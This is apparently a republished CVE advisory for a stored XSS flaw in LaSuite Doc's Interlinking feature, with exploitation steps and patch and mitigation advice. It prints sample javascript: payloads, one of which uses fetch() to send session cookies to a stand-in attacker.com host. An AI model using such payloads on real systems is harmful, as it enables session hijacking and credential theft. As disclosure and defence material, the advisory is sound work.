Listen to this Post
LaSuite Doc versions from 3.8.0 to 4.3.0 contain a Stored Cross-Site Scripting (XSS) vulnerability in the Interlinking feature. This feature allows users with editing privileges to create links to other documents within the editor. The application fails to validate or sanitize the URL entered for these inter-document links. An attacker who has the ability to edit documents can exploit this by injecting a malicious `javascript:` URL instead of a legitimate HTTP/HTTPS link. When other users, including those with higher privileges, view the document and click on the poisoned link, the JavaScript code embedded in the URL executes within their browser session. This can lead to session hijacking, credential theft, or unauthorized actions performed on behalf of the victim. The vulnerability stems from improper neutralization of input during page generation (CWE-79) . The issue has been addressed and fixed in version 4.4.0 .
DailyCVE Form:
Platform: LaSuite Doc
Version: 3.8.0-4.3.0
Vulnerability :Stored XSS
Severity: HIGH
date: Jan 15 2026
Prediction: Patch Jan 2026
What Undercode Say:
Analytics
The vulnerability is triggered when the `javascript:` protocol is used in the Interlinking feature’s URL field. A sample payload an attacker might insert is:
javascript:alert('XSS Vulnerability')
A more harmful payload for stealing session cookies could be:
javascript:fetch('https://attacker.com/steal?cookie='+document.cookie)
The fix implemented in version 4.4.0 likely involves validating the URL scheme against an allow-list, rejecting non-HTTP/HTTPS protocols . The specific commit fixing this issue can be found in the project’s repository .
How Exploit
- Attacker with document editing privileges logs into LaSuite Doc.
- Attacker creates a new document or edits an existing one.
- Inside the editor, the attacker uses the “Interlinking” feature to create a link.
- Instead of a valid URL like
https://example.com`, the attacker enters a `javascript:` URI, such asjavascript:alert(document.domain)`. - The attacker saves the document. The malicious link is now stored on the server.
- A victim user views the compromised document and clicks on the seemingly legitimate link.
- The victim’s browser executes the JavaScript code, leading to the attacker’s desired outcome.
Protection from this CVE
Immediate: Upgrade to LaSuite Doc version 4.4.0 or later .
Workaround/Mitigation: If immediate patching is not possible, administrators could consider temporarily restricting document editing privileges to only trusted users. As a defense-in-depth measure, a Web Application Firewall (WAF) could be configured to inspect requests for `javascript:` URIs in link parameters, though this is not a foolproof solution.
Code-Level Prevention: Implement strict input validation on the server-side to ensure all URLs provided for interlinking use safe protocols (e.g., HTTPS, HTTP). Output encoding should also be applied when rendering links to ensure any injected script is treated as text and not executable code.
Impact
A successful exploit allows an attacker with low-level privileges (document editing) to execute arbitrary JavaScript in the context of any user who clicks the malicious link. This can result in a high impact to confidentiality and integrity, as an attacker could potentially perform account takeover, steal sensitive information displayed on the page, or perform actions on behalf of the victim . The scope of the attack is changed, meaning the vulnerable component impacts resources beyond its security scope.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

